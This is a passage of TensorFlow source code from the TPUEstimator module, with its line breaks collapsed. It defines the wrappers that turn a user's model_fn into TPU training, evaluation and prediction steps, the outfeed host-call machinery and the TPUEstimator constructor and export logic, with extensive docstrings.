iterator outside of tf.while_loop, and call the iterator.get_next # inside tf.while_loop. This should be always safe. # # 2. If input_fn returns (features, labels), it is too late to wrap # them inside tf.while_loop, as resource initialization cannot be # handled in TF control flow properly. In this case, we will use # python loop to enqueue the data into TPU system. This may be # slow compared to the previous case. if is_dataset: run_infeed_loop_on_coordinator = False wrap_fn = ( _wrap_computation_in_while_loop if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else _wrap_computation_in_while_loop_with_stopping_signals) enqueue_ops.append( wrap_fn(device=host_device, op_fn=enqueue_ops_fn)) else: enqueue_ops.append(enqueue_ops_fn()) infeed_queues.append(captured_infeed_queue.get()) # infeed_queue is used to generate dequeue ops. The only thing it uses for # dequeue is dtypes and types. So, any one can be used. Here, grab the # first one. self._infeed_queue = infeed_queues[0] return enqueue_ops, all_hooks, run_infeed_loop_on_coordinator def _validate_input_pipeline(self): """Validates the input pipeline. Perform some sanity checks to log user friendly information. We should error out to give users better error message. But, if _WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break user code, so, log a warning. Raises: RuntimeError: If the validation failed. """ if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS): err_msg = ('Input pipeline contains one or more QueueRunners. ' 'It could be slow and not scalable. Please consider ' 'converting your input pipeline to use `tf.data` instead (see ' 'https://www.tensorflow.org/guide/datasets for ' 'instructions.') if _WRAP_INPUT_FN_INTO_WHILE_LOOP: raise RuntimeError(err_msg) else: logging.warn(err_msg) class _ModelFnWrapper(object): """A `model_fn` wrapper. This makes calling model_fn on CPU and TPU easier and more consistent and performs necessary check and mutation required by TPU training and evaluation. In addition, this wrapper manages converting the `model_fn` to a single TPU train and eval step. """ def __init__(self, model_fn, config, params, ctx): self._model_fn = model_fn self._config = config self._params = params self._ctx = ctx def call_without_tpu(self, features, labels, is_export_mode): return self._call_model_fn(features, labels, is_export_mode=is_export_mode) def convert_to_single_tpu_train_step(self, dequeue_fn): """Converts user provided model_fn` as a single train step on TPU. The user provided `model_fn` takes input tuple (features, labels) and produces the EstimatorSpec with train_op and loss for train `mode`. This usually represents a single train computation on CPU. For TPU training, a train (computation) step is first wrapped in a tf.while_loop control flow to repeat for many times and then replicated to all TPU shards. Besides the input should be taken from TPU infeed rather than input pipeline (input_fn) directly. To fit TPU loop and replicate pattern, the original train computation should be reformed, which is the returned `train_step`. Args: dequeue_fn: The function to retrieve inputs, features and labels, from TPU infeed dequeue channel. Returns: A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn representing the train step for TPU. """ host_call = _OutfeedHostCall(self._ctx) captured_scaffold_fn = _CapturedObject() def train_step(loss): """Training step function for use inside a while loop.""" del loss # unused; required in function signature. inputs = dequeue_fn() features, labels = inputs.features_and_labels() estimator_spec = self._verify_estimator_spec( self._call_model_fn(features, labels)) loss, train_op = estimator_spec.loss, estimator_spec.train_op if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access captured_scaffold_fn.capture(estimator_spec.scaffold_fn) else: captured_scaffold_fn.capture(None) # We must run train_op to update the variables prior to running the # outfeed. with ops.control_dependencies([train_op]): host_call_outfeed_ops = [] if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access and estimator_spec.host_call is not None): host_call.record({'host_call': estimator_spec.host_call}) host_call_outfeed_ops = host_call.create_enqueue_op() with ops.control_dependencies(host_call_outfeed_ops): return array_ops.identity(loss) return train_step, host_call, captured_scaffold_fn def convert_to_single_tpu_eval_step(self, dequeue_fn): """Converts user provided model_fn` as a single eval step on TPU. Similar to training, the user provided `model_fn` takes input tuple (features, labels) and produces the TPUEstimatorSpec with eval_metrics for eval `mode`. This usually represents a single evaluation computation on CPU. For TPU evaluation, a eval (computation) step is first wrapped in a tf.while_loop control flow to repeat for many times and then replicated to all TPU shards. Besides the input and output are slightly different. Input, features and labels, should be taken from TPU infeed rather than input pipeline (input_fn) directly. Output is managed in two stages. First, the model outputs as the result of evaluation computation, usually model logits, should be transferred from TPU system to CPU. Then, all model outputs are concatenated first on CPU and sent to the metric_fn for metrics computation. To fit TPU evaluation pattern, the original eval computation should be reformed, which is the returned `eval_step`. Args: dequeue_fn: The function to retrieve inputs, features and labels, from TPU infeed dequeue channel. Returns: A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn representing the eval step for TPU. """ host_calls = _OutfeedHostCall(self._ctx) captured_scaffold_fn = _CapturedObject() def eval_step(total_loss): """Evaluation step function for use inside a while loop.""" inputs = dequeue_fn() features, labels = inputs.features_and_labels() tpu_estimator_spec = self._call_model_fn(features, labels) if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access raise RuntimeError( 'estimator_spec used by TPU evaluation must have type' '`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec))) loss = tpu_estimator_spec.loss captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn) to_record = {} to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics if tpu_estimator_spec.host_call is not None: # We assume that evaluate won't update global step, so we don't wrap # this host_call. to_record['host_call'] = tpu_estimator_spec.host_call host_calls.record(to_record) with ops.control_dependencies(host_calls.create_enqueue_op()): return math_ops.add(total_loss, loss) return eval_step, host_calls, captured_scaffold_fn def convert_to_single_tpu_predict_step(self, dequeue_fn): """Converts user provided model_fn` as a single predict step on TPU. Args: dequeue_fn: The function to retrieve inputs, features and labels, from TPU infeed dequeue channel. Returns: A tuple of predict_fn, host_calls, and captured scaffold_fn. The predict_fn representing the predict step for TPU. """ host_calls = _OutfeedHostCall(self._ctx) captured_scaffold_fn = _CapturedObject() def predict_step(unused_scalar_stopping_signal): """Evaluation step function for use inside a while loop.""" inputs = dequeue_fn() features, labels = inputs.features_and_labels() stopping_signals = inputs.signals() assert stopping_signals is not None, ( 'Internal Error: `signals` is missing.') tpu_estimator_spec = self._call_model_fn( features, labels, is_export_mode=False) if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access raise RuntimeError( 'estimator_spec used by TPU prediction must have type' '`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec))) self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions) captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn) to_record = {} identity_fn = lambda **kwargs: kwargs to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions] to_record['signals'] = [identity_fn, stopping_signals] if tpu_estimator_spec.host_call is not None: to_record['host_call'] = tpu_estimator_spec.host_call host_calls.record(to_record) with ops.control_dependencies(host_calls.create_enqueue_op()): return _StopSignals.as_scalar_stopping_signal(stopping_signals) return predict_step, host_calls, captured_scaffold_fn def _verify_tpu_spec_predictions(self, predictions): """Validates TPUEstimatorSpec.predictions dict.""" # TODO(xiejw): Adds validation for prediction dictionrary. # TODO(xiejw): Adds support for single tensor as predictions. if not isinstance(predictions, dict): raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.') for (key, tensor) in predictions.items(): if tensor.shape[0].value is None: raise ValueError( 'The tensor with key ({}) in TPUEstimatorSpec.predictions has ' 'dynamic shape (should be static). Tensor: {}'.format( key, tensor)) return predictions def _validate_model_features_and_labels(self, features, labels, is_export_mode): """Validates that the features and labels for the model function are valid. A valid features/labels object is the one with: - Type: Tensor or a dictionary of Tensors - Static shape if is_export_mode is False. Args: features: the features that would be input to the model function. labels: the labels that would be input to the model function. is_export_mode: boolean value specifying if in export mode. Raises: TypeError: If features/labels are not of the correct type. ValueError: If features/labels have dynamic shape. """ def validate(obj, obj_name): """Helper validate function.""" if not isinstance(obj, ops.Tensor) and not isinstance(obj, dict): raise TypeError( 'The {} to the model returned by input_fn must be either a Tensor ' 'or a dictionary of Tensors. {}: {}'.format(obj_name, obj_name, obj)) if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode): return if isinstance(obj, ops.Tensor): if not obj.get_shape().is_fully_defined(): raise ValueError( 'The {} to the model returned by input_fn must have static shape.' ' Tensor: {}'.format(obj_name, obj)) else: for (key, tensor) in obj.items(): if not tensor.get_shape().is_fully_defined(): raise ValueError( 'The {} to the model returned by input_fn must have static ' 'shape. Key: \'{}\', Tensor: {}'.format( obj_name, key, tensor)) validate(features, 'features') if labels is not None: validate(labels, 'labels') def _call_model_fn(self, features, labels, is_export_mode=False): """Calls the model_fn with required parameters.""" self._validate_model_features_and_labels(features, labels, is_export_mode) model_fn_args = function_utils.fn_args(self._model_fn) kwargs = {} # Makes deep copy with `config` and params` in case user mutates them. config = copy.deepcopy(self._config) params = copy.deepcopy(self._params) if 'labels' in model_fn_args: kwargs['labels'] = labels elif labels is not None: raise ValueError( 'model_fn does not take labels, but input_fn returns labels.') if 'mode' in model_fn_args: kwargs['mode'] = self._ctx.mode if 'config' in model_fn_args: kwargs['config'] = config if 'params' in model_fn_args: kwargs['params'] = params if 'params' not in model_fn_args: raise ValueError('model_fn ({}) does not include params argument, ' 'required by TPUEstimator to pass batch size as ' 'params[\'batch_size\']'.format(self._model_fn)) if is_export_mode: batch_size_for_model_fn = None else: batch_size_for_model_fn = self._ctx.batch_size_for_model_fn if batch_size_for_model_fn is not None: _add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn) running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode) _add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu) estimator_spec = self._model_fn(features=features, **kwargs) if (running_on_cpu and isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access # The estimator_spec will be passed to `Estimator` directly, which expects # type `EstimatorSpec`. return estimator_spec.as_estimator_spec() else: return estimator_spec def _verify_estimator_spec(self, estimator_spec): """Validates the estimator_spec.""" if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access return estimator_spec err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.' if estimator_spec.training_chief_hooks: raise ValueError(err_msg.format('training_chief_hooks')) if estimator_spec.training_hooks: raise ValueError(err_msg.format('training_hooks')) if estimator_spec.evaluation_hooks: raise ValueError(err_msg.format('evaluation_hooks')) if estimator_spec.scaffold: logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. ' 'Please use TPUEstimatorSpec.') return estimator_spec class _OutfeedHostCall(object): """Support for `eval_metrics` and `host_call` in TPUEstimatorSpec.""" def __init__(self, ctx): self._ctx = ctx self._names = [] # All of these are dictionaries of lists keyed on the name. self._host_fns = {} self._tensor_keys = collections.defaultdict(list) self._tensors = collections.defaultdict(list) self._tensor_dtypes = collections.defaultdict(list) self._tensor_shapes = collections.defaultdict(list) @staticmethod def validate(host_calls): """Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`.""" for name, host_call in host_calls.items(): if not isinstance(host_call, (tuple, list)): raise ValueError('{} should be tuple or list'.format(name)) if len(host_call) != 2: raise ValueError('{} should have two elements.'.format(name)) if not callable(host_call[0]): raise TypeError('{}[0] should be callable.'.format(name)) if not isinstance(host_call[1], (tuple, list, dict)): raise ValueError('{}[1] should be tuple or list, or dict.'.format(name)) if isinstance(host_call[1], (tuple, list)): fullargspec = tf_inspect.getfullargspec(host_call[0]) fn_args = function_utils.fn_args(host_call[0]) # wrapped_hostcall_with_global_step uses varargs, so we allow that. if fullargspec.varargs is None and len(host_call[1]) != len(fn_args): raise RuntimeError( 'In TPUEstimatorSpec.{}, length of tensors {} does not match ' 'method args of the function, which takes {}.'.format( name, len(host_call[1]), len(fn_args))) @staticmethod def create_cpu_hostcall(host_calls): """Runs on the host_call on CPU instead of TPU when use_tpu=False.""" _OutfeedHostCall.validate(host_calls) ret = {} for name, host_call in host_calls.items(): host_fn, tensors = host_call if isinstance(tensors, (tuple, list)): ret[name] = host_fn(*tensors) else: # Must be dict. try: ret[name] = host_fn(**tensors) except TypeError as e: logging.warning( 'Exception while calling %s: %s. It is likely the tensors ' '(%s[1]) do not match the ' 'function\'s arguments', name, e, name) raise e return ret def record(self, host_calls): """Records the host_call structure.""" for name, host_call in host_calls.items(): host_fn, tensor_list_or_dict = host_call self._names.append(name) self._host_fns[name] = host_fn if isinstance(tensor_list_or_dict, dict): for (key, tensor) in six.iteritems(tensor_list_or_dict): self._tensor_keys[name].append(key) self._tensors[name].append(tensor) self._tensor_dtypes[name].append(tensor.dtype) self._tensor_shapes[name].append(tensor.shape) else: # List or tuple. self._tensor_keys[name] = None for tensor in tensor_list_or_dict: self._tensors[name].append(tensor) self._tensor_dtypes[name].append(tensor.dtype) self._tensor_shapes[name].append(tensor.shape) def create_enqueue_op(self): """Create the op to enqueue the recorded host_calls. Returns: A list of enqueue ops, which is empty if there are no host calls. """ if not self._names: return [] tensors = [] # TODO(jhseu): Consider deduping tensors. for name in self._names: tensors.extend(self._tensors[name]) with ops.device(tpu.core(0)): return [tpu_ops.outfeed_enqueue_tuple(tensors)] def create_tpu_hostcall(self): """Sends the tensors through outfeed and runs the host_fn on CPU. The tensors are concatenated along dimension 0 to form a global tensor across all shards. The concatenated function is passed to the host_fn and executed on the first host. Returns: A dictionary mapping name to the return type of the host_call by that name. Raises: RuntimeError: If outfeed tensor is scalar. """ if not self._names: return [] ret = {} # For each i, dequeue_ops[i] is a list containing the tensors from all # shards. This list is concatenated later. dequeue_ops = [] tensor_dtypes = [] tensor_shapes = [] for name in self._names: for _ in self._tensors[name]: dequeue_ops.append([]) for dtype in self._tensor_dtypes[name]: tensor_dtypes.append(dtype) for shape in self._tensor_shapes[name]: tensor_shapes.append(shape) # Outfeed ops execute on each replica's first logical core. Note: we must # constraint it such that we have at most one outfeed dequeue and enqueue # per replica. tpu_device_placement_fn = self._ctx.tpu_device_placement_function for i in xrange(self._ctx.num_replicas): with ops.device(tpu_device_placement_fn(i)): outfeed_tensors = tpu_ops.outfeed_dequeue_tuple( dtypes=tensor_dtypes, shapes=tensor_shapes) for j, item in enumerate(outfeed_tensors): dequeue_ops[j].append(item) # Deconstruct dequeue ops. dequeue_ops_by_name = {} pos = 0 for name in self._names: dequeue_ops_by_name[name] = dequeue_ops[pos:pos+len(self._tensors[name])] pos += len(self._tensors[name]) # It is assumed evaluation always happens on single host TPU system. So, # place all ops on tpu host if possible. # # TODO(jhseu): Evaluate whether this is right for summaries. with ops.device(self._ctx.tpu_host_placement_function(core_id=0)): for name in self._names: dequeue_ops = dequeue_ops_by_name[name] for i, item in enumerate(dequeue_ops): if dequeue_ops[i][0].shape.ndims == 0: raise RuntimeError( 'All tensors outfed from TPU should preserve batch size ' 'dimension, but got scalar {}'.format(dequeue_ops[i][0])) # TODO(xiejw): Allow users to specify the axis for batch size # dimension. dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0) if self._tensor_keys[name] is not None: # The user-provided eval_metrics[1] is a dict. dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops)) try: ret[name] = self._host_fns[name](**dequeue_ops) except TypeError as e: logging.warning( 'Exception while calling %s: %s. It is likely the tensors ' '(%s[1]) do not match the ' 'function\'s arguments', name, e, name) raise e else: ret[name] = self._host_fns[name](*dequeue_ops) return ret class _OutfeedHostCallHook(session_run_hook.SessionRunHook): """Hook to run host calls when use_tpu=False.""" def __init__(self, tensors): self._tensors = tensors def begin(self): # We duplicate this code from the TPUInfeedOutfeedSessionHook rather than # create a separate hook to guarantee execution order, because summaries # need to be initialized before the outfeed thread starts. # TODO(jhseu): Make a wrapper hook instead? self._init_ops = contrib_summary.summary_writer_initializer_op() # Get all the writer resources from the initializer, so we know what to # flush. self._finalize_ops = [] for op in self._init_ops: self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0])) def after_create_session(self, session, coord): session.run(self._init_ops) def before_run(self, run_context): return basic_session_run_hooks.SessionRunArgs(self._tensors) def end(self, session): session.run(self._finalize_ops) class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook): """Calculate and report global_step/sec and examples/sec during runtime.""" def __init__(self, batch_size, every_n_steps=100, every_n_secs=None, output_dir=None, summary_writer=None): self._batch_size = batch_size super(ExamplesPerSecondHook, self).__init__( every_n_steps=every_n_steps, every_n_secs=every_n_secs, output_dir=output_dir, summary_writer=summary_writer) def _log_and_record(self, elapsed_steps, elapsed_time, global_step): global_step_per_sec = elapsed_steps / elapsed_time examples_per_sec = self._batch_size * global_step_per_sec if self._summary_writer is not None: global_step_summary = Summary(value=[ Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec) ]) example_summary = Summary(value=[ Summary.Value(tag='examples/sec', simple_value=examples_per_sec) ]) self._summary_writer.add_summary(global_step_summary, global_step) self._summary_writer.add_summary(example_summary, global_step) logging.info('global_step/sec: %g', global_step_per_sec) logging.info('examples/sec: %g', examples_per_sec) class InstallSignalHandlerHook(session_run_hook.SessionRunHook): """Change SIGINT (CTRL^C) handler to force quit the process. The default behavior often results in hanging processes. The original handler is restored after training/evaluation. """ def __init__(self): self._signal_fn = signal.getsignal(signal.SIGINT) def before_run(self, run_context): signal.signal(signal.SIGINT, signal.SIG_DFL) def end(self, session): signal.signal(signal.SIGINT, self._signal_fn) class TPUEstimator(estimator_lib.Estimator): """Estimator with TPU support. TPUEstimator handles many of the details of running on TPU devices, such as replicating inputs and models for each core, and returning to host periodically to run hooks. TPUEstimator transforms a global batch size in params to a per-shard batch size when calling the `input_fn` and `model_fn`. Users should specify global batch size in constructor, and then get the batch size for each shard in `input_fn` and `model_fn` by `params['batch_size']`. - For training, `model_fn` gets per-core batch size; `input_fn` may get per-core or per-host batch size depending on `per_host_input_for_training` in `TPUConfig` (See docstring for TPUConfig for details). - For evaluation and prediction, `model_fn` gets per-core batch size and `input_fn` get per-host batch size. Evaluation ========== `model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics` for TPU evaluation. However, if eval_on_tpu is False, `model_fn` must return `EstimatorSpec` and the evaluation will execute on CPU or GPU; in this case the following discussion on TPU evaluation does not apply. `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. (See `TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns a dict from metric string name to the result of calling a metric function, namely a `(metric_tensor, update_op)` tuple. One can set `use_tpu` to `False` for testing. All training, evaluation, and predict will be executed on CPU. `input_fn` and `model_fn` will receive `train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`. Current limitations: -------------------- 1. TPU evaluation only works on a single host (one TPU worker). 2. `input_fn` for evaluation should **NOT** raise an end-of-input exception (`OutOfRangeError` or `StopIteration`). And all evaluation steps and all batches should have the same size. Example (MNIST): ---------------- ``` # The metric Fn which runs on CPU. def metric_fn(labels, logits): predictions = tf.argmax(logits, 1) return { 'accuracy': tf.metrics.precision( labels=labels, predictions=predictions), } # Your model Fn which runs on TPU (eval_metrics is list in this example) def model_fn(features, labels, mode, config, params): ... logits = ... if mode = tf.estimator.ModeKeys.EVAL: return tpu_estimator.TPUEstimatorSpec( mode=mode, loss=loss, eval_metrics=(metric_fn, [labels, logits])) # or specify the eval_metrics tensors as dict. def model_fn(features, labels, mode, config, params): ... final_layer_output = ... if mode = tf.estimator.ModeKeys.EVAL: return tpu_estimator.TPUEstimatorSpec( mode=mode, loss=loss, eval_metrics=(metric_fn, { 'labels': labels, 'logits': final_layer_output, })) ``` Prediction ========== Prediction on TPU is an experimental feature to support large batch inference. It is not designed for latency-critical system. In addition, due to some usability issues, for prediction with small dataset, CPU `.predict`, i.e., creating a new `TPUEstimator` instance with `use_tpu=False`, might be more convenient. Note: In contrast to TPU training/evaluation, the `input_fn` for prediction *should* raise an end-of-input exception (`OutOfRangeError` or `StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be precise, the ops created by `input_fn` produce one batch of the data. The `predict()` API processes one batch at a time. When reaching the end of the data source, an end-of-input exception should be raised by one of these operations. The user usually does not need to do this manually. As long as the dataset is not repeated forever, the `tf.data` API will raise an end-of-input exception automatically after the last batch has been produced. Note: Estimator.predict returns a Python generator. Please consume all the data from the generator so that TPUEstimator can shutdown the TPU system properly for user. Current limitations: -------------------- 1. TPU prediction only works on a single host (one TPU worker). 2. `input_fn` must return a `Dataset` instance rather than `features`. In fact, .train() and .evaluate() also support Dataset as return value. Example (MNIST): ---------------- ``` height = 32 width = 32 total_examples = 100 def predict_input_fn(params): batch_size = params['batch_size'] images = tf.random_uniform( [total_examples, height, width, 3], minval=-1, maxval=1) dataset = tf.data.Dataset.from_tensor_slices(images) dataset = dataset.map(lambda images: {'image': images}) dataset = dataset.batch(batch_size) return dataset def model_fn(features, labels, params, mode): # Generate predictions, called 'output', from features['image'] if mode == tf.estimator.ModeKeys.PREDICT: return tf.contrib.tpu.TPUEstimatorSpec( mode=mode, predictions={ 'predictions': output, 'is_padding': features['is_padding'] }) tpu_est = TPUEstimator( model_fn=model_fn, ..., predict_batch_size=16) # Fully consume the generator so that TPUEstimator can shutdown the TPU # system. for item in tpu_est.predict(input_fn=input_fn): # Filter out item if the `is_padding` is 1. # Process the 'predictions' ``` Exporting ========= `export_savedmodel` exports 2 metagraphs, one with `tag_constants.SERVING`, and another with `tag_constants.SERVING` and `tag_constants.TPU`. At serving time, these tags are used to select metagraph to load. Before running the graph on TPU, TPU system needs to be initialized. If TensorFlow Serving model-server is used, this is done automatically. If not, please call `session.run(tpu.initialize_system())`. `tpu.outside_compilation` can be used to wrap TPU incompatible ops in `model_fn`. Example: ---------------- ``` def model_fn(features, labels, mode, config, params): ... logits = ... export_outputs = { 'logits': export_output_lib.PredictOutput( {'logits': logits}) } def host_call(logits): class_ids = math_ops.argmax(logits) classes = string_ops.as_string(class_ids) export_outputs['classes'] = export_output_lib.ClassificationOutput(classes=classes) tpu.outside_compilation(host_call, logits) ... ``` """ def __init__(self, model_fn=None, model_dir=None, config=None, params=None, use_tpu=True, train_batch_size=None, eval_batch_size=None, predict_batch_size=None, batch_axis=None, eval_on_tpu=True, export_to_tpu=True, warm_start_from=None): """Constructs an `TPUEstimator` instance. Args: model_fn: Model function as required by `Estimator`. For training, the returned `EstimatorSpec` cannot have hooks as it is not supported in `TPUEstimator`. Instead, the user can pass the training hooks as an argument to `TPUEstimator.train()`. model_dir: Directory to save model parameters, graph and etc. This can also be used to load checkpoints from the directory into a estimator to continue training a previously saved model. If `None`, the model_dir in `config` will be used if set. If both are set, they must be same. If both are `None`, a temporary directory will be used. config: An `tpu_config.RunConfig` configuration object. Cannot be `None`. params: An optional `dict` of hyper parameters that will be passed into `input_fn` and `model_fn`. Keys are names of parameters, values are basic python types. There are reserved keys for `TPUEstimator`, including 'batch_size'. use_tpu: A bool indicating whether TPU support is enabled. Currently, - TPU training and evaluation respect this bit, but eval_on_tpu can override execution of eval. See below. - Predict still happens on CPU. train_batch_size: An int representing the global training batch size. TPUEstimator transforms this global batch size to a per-shard batch size, as params['batch_size'], when calling `input_fn` and `model_fn`. Cannot be `None` if `use_tpu` is `True`. Must be divisible by total number of replicas. eval_batch_size: An int representing evaluation batch size. Must be divisible by total number of replicas. predict_batch_size: An int representing the prediction batch size. Must be divisible by total number of replicas. batch_axis: A python tuple of int values describing how each tensor produced by the Estimator `input_fn` should be split across the TPU compute shards. For example, if your input_fn produced (images, labels) where the images tensor is in `HWCN` format, your shard dimensions would be [3, 0], where 3 corresponds to the `N` dimension of your images Tensor, and 0 corresponds to the dimension along which to split the labels to match up with the corresponding images. If None is supplied, and per_host_input_for_training is True, batches will be sharded based on the major dimension. If tpu_config.per_host_input_for_training is False or `PER_HOST_V2`, batch_axis is ignored. eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`. export_to_tpu: If True, `export_savedmodel()` exports a metagraph for serving on TPU besides the one on CPU. warm_start_from: Optional string filepath to a checkpoint or SavedModel to warm-start from, or a `tf.estimator.WarmStartSettings` object to fully configure warm-starting. If the string filepath is provided instead of a `WarmStartSettings`, then all variables are warm-started, and it is assumed that vocabularies and Tensor names are unchanged. Raises: ValueError: `params` has reserved keys already. """ if config is None or not isinstance(config, tpu_config.RunConfig): raise ValueError( '`config` must be provided with type `tpu_config.RunConfig`') if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS): raise ValueError('{} are reserved keys but existed in params {}.'.format( _RESERVED_PARAMS_KEYS, params)) if use_tpu: # Perform some very basic validations. More validations will be found in # _InternalTPUContext. if train_batch_size is None: raise ValueError('`train_batch_size` cannot be `None`') util_lib.check_positive_integer(train_batch_size, 'train_batch_size') if (config.tpu_config.per_host_input_for_training is tpu_config.InputPipelineConfig.PER_SHARD_V1 and config.tpu_config.num_cores_per_replica): raise ValueError( 'Model parallelism only supports per host input for training. ' 'Please adjust TPURunconfig.per_host_input_for_training.') if eval_batch_size is not None: util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size') if predict_batch_size is not None: util_lib.check_positive_integer(predict_batch_size, 'predict_batch_size') # Verifies the model_fn signature according to Estimator framework. estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access # We cannot store config and params in this constructor as parent # constructor might change them, such as assigning a temp dir for # config.model_dir. model_function = self._augment_model_fn(model_fn, batch_axis) # Overwrite log_step_count_steps to disable TensorLoggingHook and # StepCounterHook from being created in Estimator. TPUEstimator already # added equivalent hooks in _augment_model_fn above. self._log_every_n_steps = config.log_step_count_steps config = config.replace(log_step_count_steps=None) # Passing non-None params as wrapped model_fn has it. params = params or {} super(TPUEstimator, self).__init__( model_fn=model_function, model_dir=model_dir, config=config, params=params, warm_start_from=warm_start_from) self._iterations_per_training_loop = ( self._config.tpu_config.iterations_per_loop) # All properties passed to _InternalTPUContext are immutable. # pylint: disable=protected-access self._ctx = tpu_context._get_tpu_context( self._config, train_batch_size, eval_batch_size, predict_batch_size, use_tpu, eval_on_tpu) self._export_to_tpu = export_to_tpu self._is_input_fn_invoked = None def _add_meta_graph_for_mode(self, builder, input_receiver_fn_map, checkpoint_path, strip_default_attrs, save_variables=True, mode=model_fn_lib.ModeKeys.PREDICT, export_tags=None, check_variables=True): if mode != model_fn_lib.ModeKeys.PREDICT: raise NotImplementedError( 'TPUEstimator only handles mode PREDICT for export_savedmodel(); ' 'got {}.'.format(mode)) (super(TPUEstimator, self). _add_meta_graph_for_mode(builder, input_receiver_fn_map, checkpoint_path, strip_default_attrs, save_variables, mode=mode, export_tags=export_tags, check_variables=check_variables)) if self._export_to_tpu: input_receiver_fn_map = {_REWRITE_FOR_INFERENCE_MODE: input_receiver_fn_map[mode]} export_tags = [tag_constants.SERVING, tag_constants.TPU] mode = _REWRITE_FOR_INFERENCE_MODE # See b/110052256 for why `check_variables` is `False`. (super(TPUEstimator, self). _add_meta_graph_for_mode(builder, input_receiver_fn_map, checkpoint_path, strip_default_attrs, save_variables=False, mode=mode, export_tags=export_tags, check_variables=False)) def _call_model_fn(self, features, labels, mode, config): if mode == _REWRITE_FOR_INFERENCE_MODE: return self._call_model_fn_for_inference(features, labels, mode, config) else: return super(TPUEstimator, self)._call_model_fn( features, labels, mode, config) def _call_model_fn_for_inference(self, features, labels, mode, config): """Wraps `_call_model_fn` for `export_savedmodel`.""" if mode != _REWRITE_FOR_INFERENCE_MODE: raise ValueError('mode must be {}; ' 'got {}.'.format(_REWRITE_FOR_INFERENCE_MODE, mode)) capture = _CapturedObject() def computation(): """Compute tpu tensors used in export_outputs. Passed to rewrite_for_inference so that model_fn will be called under the rewriting contexts. Only tpu tensors are returned, but export_outputs and scaffold are captured. Returns: A list of Tensors used in export_outputs and not marked for outside_compilation. """ # We should only call model fn once and it should be inside `computation` # so that building the graph will happen under `rewrite_for_inference`. mode = model_fn_lib.ModeKeys.PREDICT estimator_spec = self._call_model_fn(features, labels, mode, config) # We pick the TPU tensors out from `export_output` and later return them # from `computation` for rewriting. tensors_dict = collections.OrderedDict( (k, _export_output_to_tensors(v)) for k, v in six.iteritems(estimator_spec.export_outputs) ) tensors = nest.flatten(tensors_dict) tpu_tensors = [t for t in tensors if _is_tpu_tensor(t)] # We cannot return anything other than `tpu_tensors` here so we capture # the rest for later use. capture.capture((estimator_spec, tensors_dict, tensors)) return tpu_tensors tpu_tensors_on_cpu = tpu.rewrite_for_inference(computation) estimator_spec, tensors_dict, tensors = capture.get() # Reconstruct `tensors`, but with `tpu_tensors` replaced with # `tpu_tensors_on_cpu`. new_tensors = [] for t in tensors: if _is_tpu_tensor(t): new_tensors.append(tpu_tensors_on_cpu.pop(0)) elif t is None: new_tensors.append(None) else: # Only fetching `tpu_tensors_on_cpu` does not trigger # TPU computation and blocks, so we add the control dependency here. control_inputs = (tpu_tensors_on_cpu if isinstance(tpu_tensors_on_cpu, (list, tuple)) else (tpu_tensors_on_cpu,)) with ops.control_dependencies(control_inputs): new_tensors.append(array_ops.identity(t)) # Reconstruct `tensors_dict`. new_tensors_dict = nest.pack_sequence_as(tensors_dict, new_tensors) # Reconstruct `export_outputs`. export_outputs = estimator_spec.export_outputs new_export_outputs = collections.OrderedDict( (k, _clone_export_output_with_tensors(export_outputs[k], v)) for k, v in six.iteritems(new_tensors_dict) ) return estimator_spec._replace(export_outputs=new_export_outputs) def _create_global_step(self, graph): """Creates a global step suitable for TPUs. Args: graph: The graph in which to create the global step. Returns: A global step `Tensor`. Raises: ValueError: if the global step tensor is already defined. """ return _create_global_step(graph) def _convert_train_steps_to_hooks(self, steps, max_steps): with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx: if ctx.is_running_on_cpu(): return super(TPUEstimator, self)._convert_train_steps_to_hooks( steps, max_steps) # On TPU. if steps is None and max_steps is None: raise ValueError( 'For TPU training, one of `steps` or `max_steps` must be set. ' 'Cannot be both `None`.') # Estimator.train has explicit positiveness check. if steps is not None: util_lib.check_positive_integer(steps, 'Train steps') if max_steps is 